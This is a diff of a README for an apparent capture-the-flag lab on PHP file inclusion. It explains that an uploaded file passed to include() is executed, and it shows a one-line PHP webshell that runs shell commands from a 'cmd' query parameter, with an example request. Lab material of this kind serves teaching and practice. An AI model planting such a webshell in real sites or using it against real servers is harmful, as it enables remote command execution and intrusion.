skyepodium/ctf-implements/web/php-include/readme.md

 # php webshell by include
 ### 1) summary
-Executes the file passed as a parameter of the include function.
+flag is in the flag.txt

+### 2) vulnerabilities
-When the php file is delivered, it is executed.
+When the php file is passed to inlucde function, it is executed.
 ```
 include($uploaded_file_path);
 ```

-### 2) code
+### 3) exploit
 When the following code is executed by the include function,
 ```php
 <?php
     echo system($_GET["cmd"]);
 ?>
 ```
-you can execute a Linux command by passing cmd as a query parameter.
+you can execute a Linux command by passing cmd as a query parameter
 ```
 https://example.com?file=asfdbwr?cmd=ls -al;
 ```

-### 3) How to run
+### 4) How to run
 Execute the following command in the location where the docker-compose.yml file is located
 ```
 docker-compose up --build